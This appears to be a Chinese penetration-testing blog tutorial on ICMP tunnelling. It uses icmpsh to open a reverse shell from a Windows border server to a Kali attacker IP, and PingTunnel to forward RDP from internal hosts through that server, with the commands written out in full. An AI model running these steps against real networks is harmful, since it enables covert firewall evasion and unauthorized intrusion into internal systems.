0
点赞
收藏
分享

微信扫一扫

内网安全 隐藏通信隧道技术——网络层.(遨游于 内网任何主机)

💛你是我跋山涉水的星光💚,💛一眼春秋💚,💛忘了流浪💚

🌴🌴🌴🌴🌴🌴🌴🌴🌴🌴🌴🌴🌴🌴🌴🌴🌴🌴🌴🌴🌴🌴🌴🌴🌴🌴🌴🌴🌴🌴🌴

       

🍪目录:

🌻🌻🌻当我们内网收集完信息完,就有进行下一步判断 然后做隧道通信.

         🌲隧道技术的概括:

🌲常用的隧道有以下:

🌲工具下载:

🌲免责声明:

🌲第一步:内网连通性判断.(判断协议能不能通过防火墙

🍉用 ICMP 协议进行判断有没有连通性.

🌲第二步:搭建 网络层 隧道.

🌼网络层:IPv6隧道、ICMP隧道、GRE隧道.(这里我演示的是 ICMP隧道.

利用  icmpsh  工具.

        🍉(1)外网 攻击机.( kali )

        🍉边界服务器.( win 2008R2 )

        🍉隧道搭建完成.( kali )

        利用  PingTunnel 工具.

        🍉(1)边界服务器( kali )

        🍉(2) 外网 攻击机.( kali )

        🍉(3)再开一个 计算机 进行远程连接 外网 攻击机.( kali )


       

          

           

    

       

🌲第一步:内网连通性判断.(判断协议能不能通过防火墙

🍉用 ICMP 协议进行判断有没有连通性.

ping IP

       

🌲第二步:搭建 网络层 隧道.

🌼网络层:IPv6隧道、ICMP隧道、GRE隧道.(这里我演示的是 ICMP隧道.

利用  icmpsh  工具.

🍉(1)外网 攻击机.( kali )

🍓1.下载 icmpsh 工具(如果下载不了 ,可以在上面的工具链接里下载.

git clone https://github.com/inquisb/icmpsh.git

      

🍓2.下载解压后,切换到 icmpsh 下.

cd icmpsh 

      

🍓3.安装需要 Python 库文件.

pip2 install impacket 

      

🍓4.关闭 icmp 应答,防止内核对自己的 ping 包响应.

sysctl -w net.ipv4.icmp_echo_ignore_all=1 

记得不用的时候要改回来.

sysctl -w net.ipv4.icmp_echo_ignore_all=0

     

🍓5.搭建和 边界服务器 的隧道.

python2 icmpsh_m.py [外网的攻击机IP] [内网的主机IP]

           

🍉边界服务器. win 2008R2

🍓1.下载解压后,切换到 icmpsh 下.

cd C:\Users\icmpsh

    

🍓2.搭建和 外网的 kali 隧道.

icmpsh.exe -t [攻击机IP]

     

🍉隧道搭建完成.kali

         

利用  PingTunnel 工具.

🍉(1)边界服务器( kali

🍓1.解压编译 安装.

tar zxf PingTunnel-0.72.tar.gz          
cd PingTunnel  
make && makeinstall

      

🍓2.安装 pcap.h

wget http://www.tcpdump.org/release/libpcap-1.9.0.tar.gz 
tar zxvf libpcap-1.9.0.tar.gz

         

cd libpcap-1.9.0        //切换目录
./configure

        

🍓3.开启 隧道.

ptunnel -x bgxg         //(bgxg)是设置的隧道连接密码.

     

🍉(2) 外网 攻击机.( kali )

🍓1.解压编译 安装.(安装步骤 和 上面的一样.

tar zxf PingTunnel-0.72.tar.gz          
cd PingTunnel  
make && makeinstall

      

🍓2.安装 pcap.h

wget http://www.tcpdump.org/release/libpcap-1.9.0.tar.gz 
tar zxvf libpcap-1.9.0.tar.gz

       

cd libpcap-1.9.0        //切换目录
./configure

      

🍓3.隧道 连接.(边界服务器为跳板,跳到内网别的主机上.

ptunnel -p (边界服务器IP地址) -lp 1080 -da (转发到内网的其他主机的IP) -dp 3389 -x (隧道的连接密码)

参数说明:
-x 指定 icmp 隧道连接验证密码
-lp 指定要监听的本地 tcp 端口
-da 指定要转发到的机器的 ip 地址
-dp 指定要转发到的机器的 tcp 端口
-p  指定icmp隧道另一端机器的 ip 地址

     

🍉(3)再开一个 计算机 进行远程连接 外网 攻击机.( kali )

🍓(1)按下 win+r 打开运行,然后输入 mstsc 回车确认打开远程桌面连接面板.(记得要连接内网主机的3389端口用开才行.

     

     

    

参考链接:【渗透测试】ICMP隧道技术之icmpsh使用_久违 °的博客-CSDN博客_icmpsh

举报

相关推荐

0 条评论